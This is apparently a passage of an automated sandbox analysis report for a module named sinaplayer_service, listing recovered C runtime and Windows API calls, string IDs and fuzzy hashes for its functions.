                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D42CB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__doserrno$AttributesErrorFileLast__dosmaperr_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2636503730-0
                                                                                                                                                                                                    • Opcode ID: 046ab535efe429e0d168d9be38232c603888a0e4785b8d1db2c0ce3981109fd9
                                                                                                                                                                                                    • Instruction ID: b0d3a1ed04ecdf680361daeadca1eb4d4f817248b7143dae9a0401d17ac07b65
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 046ab535efe429e0d168d9be38232c603888a0e4785b8d1db2c0ce3981109fd9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E11CE3460A3099BFB019BB4D8047AD7BF8BF0A324F416449EE10DF290DBB4CD40AB61
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: +$g
                                                                                                                                                                                                    • API String ID: 0-3915867470
                                                                                                                                                                                                    • Opcode ID: 2ea1763d89e9f418f724a577c5d931f8ea1bbcd8d767b2cc3a5d0ae812590928
                                                                                                                                                                                                    • Instruction ID: eb9109c130ab8d02438a7459ad2c982759110c4077a2a571eea461113d46b72c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ea1763d89e9f418f724a577c5d931f8ea1bbcd8d767b2cc3a5d0ae812590928
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF02D5B1D5922A9AFB218B54CC887FDB7B4BB45314F9461D9D408AF150EB758AC0EFC0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F720: GetLastError.KERNEL32(?,?,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E), ref: 6D08F722
                                                                                                                                                                                                      • Part of subcall function 6D08F720: __crtFlsGetValue.MSVCR120(?,?,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E), ref: 6D08F730
                                                                                                                                                                                                      • Part of subcall function 6D08F720: SetLastError.KERNEL32(00000000,?,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E), ref: 6D08F741
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000086,00000002), ref: 6D12856D
                                                                                                                                                                                                    • __get_sys_err_msg.LIBCMT ref: 6D128590
                                                                                                                                                                                                      • Part of subcall function 6D126394: __sys_nerr.MSVCR120(00000086,?,6D12627A,00000000), ref: 6D12639F
                                                                                                                                                                                                      • Part of subcall function 6D126394: __sys_nerr.MSVCR120(00000086,?,6D12627A,00000000), ref: 6D1263A8
                                                                                                                                                                                                      • Part of subcall function 6D126394: __sys_errlist.MSVCR120(00000086,?,6D12627A,00000000), ref: 6D1263AF
                                                                                                                                                                                                    • _mbstowcs_s.LIBCMT(00000000,?,00000086,00000000,00000085), ref: 6D12859A
                                                                                                                                                                                                      • Part of subcall function 6D092F50: _mbstowcs_s_l.MSVCR120(?,?,?,?,?,00000000), ref: 6D092F64
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D1285AF
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6D12637F,00000000,00000000,00000000,00000000,?,00000086,?,00000000,00000000), ref: 6D128642
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,6D12637F,00000000,00000000,00000000,00000000,?,00000086,?,00000000,00000000), ref: 6D12864C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast__sys_nerr$Value__crt__get_sys_err_msg__sys_errlist_calloc_crt_errno_invalid_parameter_noinfo_invoke_watson_mbstowcs_s_mbstowcs_s_l
                                                                                                                                                                                                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                                                                    • API String ID: 2345991744-798102604
                                                                                                                                                                                                    • Opcode ID: 7b8174727d5dd0e875fbc6508ed8562b98a9d459612b5456ddf016d969685aa9
                                                                                                                                                                                                    • Instruction ID: b3fc15731eda377bc70dd99fecae10c3bb472c88c34bb04c92856b3804f782d8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b8174727d5dd0e875fbc6508ed8562b98a9d459612b5456ddf016d969685aa9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6831BC6294D3D11FC71387704C69556BF286F23214B0EC3CFE9898F59BE79A988187A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6D11DEF3
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,00000000,?,?,?,00000000,00000000), ref: 6D11DF06
                                                                                                                                                                                                    • _getptd.MSVCR120(?,?,?,00000000,00000000), ref: 6D11DF0E
                                                                                                                                                                                                    • _CallSETranslator.LIBCMT ref: 6D11DF3C
                                                                                                                                                                                                    • ?_inconsistency@@YAXXZ.MSVCR120(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6D11DF52
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$?_inconsistency@@CallEncodePointerTranslator
                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                    • API String ID: 2381479982-2084237596
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0ACB8A
                                                                                                                                                                                                    • __ExceptionPtr::__ExceptionPtr.LIBCMT ref: 6D0ACC10
                                                                                                                                                                                                    • _Ptr_base.LIBCMT ref: 6D0ACC36
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Exception$H_prolog3_catchPtr::__Ptr_base
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 3931061724-1018135373
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                    • API String ID: 2959964966-1255198513
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                    • API String ID: 2959964966-1255198513
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::
                                                                                                                                                                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                    • API String ID: 1333004437-2211150622
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindCompleteObject.LIBCMT ref: 6D11EA15
                                                                                                                                                                                                    • FindMITargetTypeInstance.LIBCMT ref: 6D11EA4E
                                                                                                                                                                                                      • Part of subcall function 6D11E634: strcmp.MSVCR120(?,-00000008,?,00000000,00000000), ref: 6D11E686
                                                                                                                                                                                                      • Part of subcall function 6D11E634: strcmp.MSVCR120(?,?,?,00000000,00000000), ref: 6D11E6B4
                                                                                                                                                                                                      • Part of subcall function 6D11E634: PMDtoOffset.LIBCMT ref: 6D11E6C6
                                                                                                                                                                                                    • FindVITargetTypeInstance.LIBCMT ref: 6D11EA55
                                                                                                                                                                                                    • PMDtoOffset.LIBCMT ref: 6D11EA66
                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT(Bad dynamic_cast!,?,?,?,?,?,6D11EAE8,00000018), ref: 6D11EA8F
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D11EB04,Bad dynamic_cast!,?,?,?,?,?,6D11EAE8,00000018), ref: 6D11EA9D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Find$InstanceOffsetTargetTypestrcmp$CompleteExceptionObjectThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                    • String ID: Bad dynamic_cast!
                                                                                                                                                                                                    • API String ID: 3548542081-2956939130
                                                                                                                                                                                                    • Opcode ID: 8bfb87be80494eb107a73e97c2f1f2a793391a911ea9a4d36ddf90228ec42b2d
                                                                                                                                                                                                    • Instruction ID: 98790ac5d3591b021b59a1400eb6612ba161f6624f53995c4449e93404657bbf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bfb87be80494eb107a73e97c2f1f2a793391a911ea9a4d36ddf90228ec42b2d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5021C3B290C2059FDB01CFE8EC44AAE7B74BF49340F164029E511E7649DBB59B08DB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _strnicoll_l.MSVCR120(?,?,?,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D097029
                                                                                                                                                                                                      • Part of subcall function 6D096F4B: __crtCompareStringA.MSVCR120(?,?,00001001,005C2D90,?,?,?,00000000,00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20), ref: 6D096FAF
                                                                                                                                                                                                    • _errno.MSVCR120( *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0D777C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120( *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0D7787
                                                                                                                                                                                                    • _errno.MSVCR120( *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0D7796
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120( *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0D77A1
                                                                                                                                                                                                    • __crtCompareStringA.MSVCR120(?,?,00001001,?,?,?,?,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0D77C1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CompareString__crt_errno_invalid_parameter_noinfo$_getptd_strnicoll_l
                                                                                                                                                                                                    • String ID: *\
                                                                                                                                                                                                    • API String ID: 1228067600-3401207301
                                                                                                                                                                                                    • Opcode ID: 26e6da545074f4cdd8a504864dee35bddd7cbb4341ca73ddcb67acf8c5d46a9e
                                                                                                                                                                                                    • Instruction ID: 9de4d0335c90aac16b440f8e396f52d26ef175b1c941dd72eb485be030be9a47
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26e6da545074f4cdd8a504864dee35bddd7cbb4341ca73ddcb67acf8c5d46a9e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3111BE72E04206ABFB058E64CC40BBFB7A9AF94360F118659A9205B1A0EB719C119BE1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strncpy_s.MSVCR120(?,?,?,00000002), ref: 6D127968
                                                                                                                                                                                                    • _ismbblead.MSVCR120(00000001), ref: 6D127992
                                                                                                                                                                                                    • strncpy_s.MSVCR120(?,?,00000000,00000000), ref: 6D1279DF
                                                                                                                                                                                                    • strncpy_s.MSVCR120(00000000,?,?,00000000), ref: 6D127A14
                                                                                                                                                                                                    • strncpy_s.MSVCR120(00000000,?,00000000,?), ref: 6D127A30
                                                                                                                                                                                                    • strncpy_s.MSVCR120(00000000,?,?,?), ref: 6D127A4E
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D127AB2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D127AC0
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: strncpy_s$_errno_invalid_parameter_noinfo_ismbblead
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 519590025-0
                                                                                                                                                                                                    • Opcode ID: 9c353a184572e0facde5fd778c95f8e970b50d570a1baa377f4b5500e9aeb446
                                                                                                                                                                                                    • Instruction ID: 4380d239b6b316c89834bfc3a0011b3a8303f8275839e61c31e7481f97da3caa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c353a184572e0facde5fd778c95f8e970b50d570a1baa377f4b5500e9aeb446
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA718E31E0434B9BEF268E28C850BBB77A5AF65364F19415BEC5466248D3F2DAC0C7A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _filbuf.MSVCR120(?,00000000), ref: 6D095905
                                                                                                                                                                                                    • memcpy_s.MSVCR120(?,?,?,?,00000000), ref: 6D0959E0
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,00000000), ref: 6D095F46
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D5577
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D5582
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,000000FF), ref: 6D0D5598
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,000000FF,00000000), ref: 6D0D55E7
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D55EF
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errnomemset$_filbuf_fileno_invalid_parameter_noinfomemcpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4246007277-0
                                                                                                                                                                                                    • Opcode ID: 57bad2a4ea697ecff6aff00c7a9e90cf418f640a5f96defc0ab8a533490cb8c9
                                                                                                                                                                                                    • Instruction ID: eb99670d2084b3e96776976450d5a03f4f53a5f0c2643c359212af8a5c1af964
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57bad2a4ea697ecff6aff00c7a9e90cf418f640a5f96defc0ab8a533490cb8c9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B051E438A143069BFB158E7A88887BE77B6FF05321F10972AE8358B2D0D770D9509B51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR120 ref: 6D0F4DEA
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0F4E52
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6D0F4E69
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6D0F4E7C
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0F4EC8
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6D0F4EDF
                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 6D0F4EF2
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0F4F3B
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::FindGroupRing::ScheduleSchedulingSegment$List$AcquireConcurrency@@Lock@details@ReaderWrite@_Writer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 230955726-0
                                                                                                                                                                                                    • Opcode ID: 266e769967685039b14a5621c483210179a375d5f116787b4f7c2708b98a48a2
                                                                                                                                                                                                    • Instruction ID: 44617f0fc4b5d9e314577dc8d14fdd7c5edd90757cbce405150c12054d021a0e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 266e769967685039b14a5621c483210179a375d5f116787b4f7c2708b98a48a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A514071A0420AAFEB18CB54C994FEEB7F8FF49314F214169ED1997641C734EA46CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D107B8D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D107B97
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _get_timezone.MSVCR120(?), ref: 6D107BBA
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6D107BE0
                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,23C34600,00000000), ref: 6D107C2D
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6D107C99
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D107CCE
                                                                                                                                                                                                    • _gmtime64_s.MSVCR120(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6D107CE7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$FileInformationSystemZone__aullrem_errno_get_timezone_gmtime64_s_invalid_parameter_invalid_parameter_noinfo_invoke_watson
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,00000000,6D15F520,?,?,6D09EBC6,?), ref: 6D0D504D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,00000000,6D15F520,?,?,6D09EBC6,?), ref: 6D0D5058
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsncmp.MSVCR120 ref: 6D0B1991
                                                                                                                                                                                                    • _wcscspn.LIBCMT(?,Function_00021268), ref: 6D0B19BD
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000083,?,00000000), ref: 6D0B19F5
                                                                                                                                                                                                    • _wcspbrk.LIBCMT(00000000,6D0B1AA4,00000000,00000000,00000000), ref: 6D0B1A61
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcscspn_wcspbrkwcsncmpwcsncpy_s
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10BBAC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D10BBB6
                                                                                                                                                                                                    • strcpy_s.MSVCR120(?,00000000,?,?), ref: 6D10BBDE
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(?,?,?), ref: 6D10BC1E
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10BC3B
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D10BC45
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(?,?,?), ref: 6D10BC60
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10BC87
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_ismbblead_l$strcpy_s
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?), ref: 6D094C90
                                                                                                                                                                                                    • _read.MSVCR120(00000000,?,?), ref: 6D094C97
                                                                                                                                                                                                    • _fileno.MSVCR120(?), ref: 6D094CBA
                                                                                                                                                                                                    • _fileno.MSVCR120(?), ref: 6D094CCA
                                                                                                                                                                                                    • _fileno.MSVCR120(?), ref: 6D094CDB
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?), ref: 6D094CE6
                                                                                                                                                                                                      • Part of subcall function 6D0958BC: _malloc_crt.MSVCR120(00001000,0]m,?,6D0B13DD,0]m,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0958C6
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4FFE
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D5009
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$_errno_invalid_parameter_noinfo_malloc_crt_read
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1828220225-0
                                                                                                                                                                                                    • Opcode ID: fba175331dc037c894bec56e68fbc809d03a3b87f3afa52018a4aadda22211f6
                                                                                                                                                                                                    • Instruction ID: be8754a26fa413d149e7b28a0c120cf4fddad29fe590e48a0c0baef0ce94dc60
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fba175331dc037c894bec56e68fbc809d03a3b87f3afa52018a4aadda22211f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D931D475418607BAF7014A7AC444779BBE4BF0A338F50A30AE8748E1D0D768E051AB99
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002,?,00000000,?), ref: 6D0B2F3A
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,00000000), ref: 6D0B2F40
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 6D0B2F47
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 6D0B2F4A
                                                                                                                                                                                                      • Part of subcall function 6D094DF1: _get_osfhandle.MSVCR120(?,?,?,?,6D094F10,?,6D094F30,00000010), ref: 6D094DFA
                                                                                                                                                                                                      • Part of subcall function 6D094DF1: _get_osfhandle.MSVCR120(?), ref: 6D094E1D
                                                                                                                                                                                                      • Part of subcall function 6D094DF1: CloseHandle.KERNEL32(00000000), ref: 6D094E24
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D0DF075
                                                                                                                                                                                                    • __doserrno.MSVCR120(?), ref: 6D0DF080
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4219055303-0
                                                                                                                                                                                                    • Opcode ID: ffc27bb610f49e99ed73b4fc4f227bdd7be98a01fa50a9068d82d40d6681ec23
                                                                                                                                                                                                    • Instruction ID: 153e7ac0f569b766077a54cab06c79761ae71f05fe72f710e471dd7cd4805427
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffc27bb610f49e99ed73b4fc4f227bdd7be98a01fa50a9068d82d40d6681ec23
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8131F871918295BFEB119F38D884BAD7FF5EF06314F158299E9648F292CB71D800CB50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Dint$__getfpcontrolwordfegetround
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3049488995-0
                                                                                                                                                                                                    • Opcode ID: 77600fbad549342e0cd42d9fdecb4f30e899c42ce8ce918dd996c43f0f5eb897
                                                                                                                                                                                                    • Instruction ID: bfc537e900196c30aa83e8f37d93cc59abf9dc3ecab64f70cc1cee4c433dac51
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77600fbad549342e0cd42d9fdecb4f30e899c42ce8ce918dd996c43f0f5eb897
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7021B1B6048A1FA6EF008E96F401BFA3768DB447A8F114016FDB8994C8DFB8D2E0C740
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,6D0A0D40,0000000C), ref: 6D0A0C95
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
